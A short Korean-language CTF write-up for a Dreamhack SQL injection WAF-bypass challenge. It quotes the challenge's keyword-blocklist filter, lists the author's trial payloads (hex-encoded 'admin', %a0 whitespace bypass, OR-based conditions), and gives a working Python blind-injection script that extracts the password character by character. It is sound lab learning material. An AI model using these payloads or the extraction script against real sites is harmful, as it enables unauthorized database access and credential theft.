sql injection bypass WAF advanced

keywords = ['union', 'select', 'from', 'and', 'or', 'admin', ' ', '*', '/', 
            '\n', '\r', '\t', '\x0b', '\x0c', '-', '+']
def check_WAF(data):
    for keyword in keywords:
        if keyword in data.lower():
            return True

    return False

방화벽 키워드
?uid=’ || uid=0x61646d696e0a
여기서 공백을 우회해줘야 하는데…
%a0?
?uid=’%a0||%a0uid=0x61646d696e0a
이건 아예 서버 나감

char(0x2f,0x2a,0x2a,0x2f)
?uid=’chr(0x2f,0x2a,0x2a,0x2f)||chr(0x2f,0x2a,0x2a,0x2f)uid=0x61646d696e0a
얘도 서버 나감

?uid=’

length(upw)>10;#’

upw길이 44

import requests
import string
import sys
from urllib.parse import urljoin
from urllib import parse 
from requests import get

host = 'http://host3.dreamhack.games:23172/'

password_length = 44; #패스워드 길이
password = "" # 비밀번호(flag)
url=host+'?uid=%27||'
char=string.digits+string.ascii_letters

for i in range(1, 45): #pw 길이만큼 반복 
    for j in char:
        param="ascii(mid(upw,"+str(i)+",1))="+str(ord(j))+";%23"
        URL=url+param
        response=requests.get(URL)
        if response.text.find("admin")>0:
            print(j)
            password+=j
            break

print(password)

저번 파이썬 코드랑 똑같음
왜 advanced인거지..?

SQL Injection WAF Bypass Python